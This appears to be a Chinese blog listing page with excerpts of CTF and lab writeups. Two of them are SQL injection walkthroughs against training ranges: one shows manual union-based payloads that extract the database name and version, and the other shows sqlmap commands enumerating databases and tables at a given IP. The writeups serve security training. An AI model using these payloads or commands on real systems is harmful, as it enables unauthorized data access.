- 博客(14)
- 收藏
- 关注
RSS订阅原创 SQL手工注入漏洞测试(MySQL数据库-字符型)
启动靶场点击‘关于平台停机维护的通知’在id后加’%23判断是否存在注入点,加’ and 1=1%23,存在注入点。’ order by 5%23’ order by 4%23,有四个字段。id=1’ and 1=2 union select 1,2,3,4%23id=1’ and 1=2 union select 1,database(),version(),4%23id=1’ ...
2019-12-10 23:46:57
414
1原创 墨者学院SQL注入漏洞测试(布尔盲注)
点击链接点击下方‘关于平台停机维护的通知’打开kali中的sqlmap输入sqlmap -u http://219.153.49.228:45316/new_list.php?id=1 --current-db 得到数据库名stormgroupsqlmap -u 219.153.49.228:45316/new_list.php?id=1 -D stormgroup --tables 获...
2019-12-06 21:42:50
303
原创 AGCTF
1.一个32岁学长的情书将IFDUGVCGPN3TGX3BGIZV62TVON2F6ZRSGEZW4ZDTL4QX2base!32解码,得到FLAG.
2019-12-05 21:35:31
132
原创 AGCTF
AGCTFweb1.百度一下,你就知道.点击链接,修改IP地址。将蓝色字体复制到控制台回车。得到"AGCTF{what_the_jsfuck}"。2.百度一下,你就知道.方法同上。
2019-12-05 21:21:07
258
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人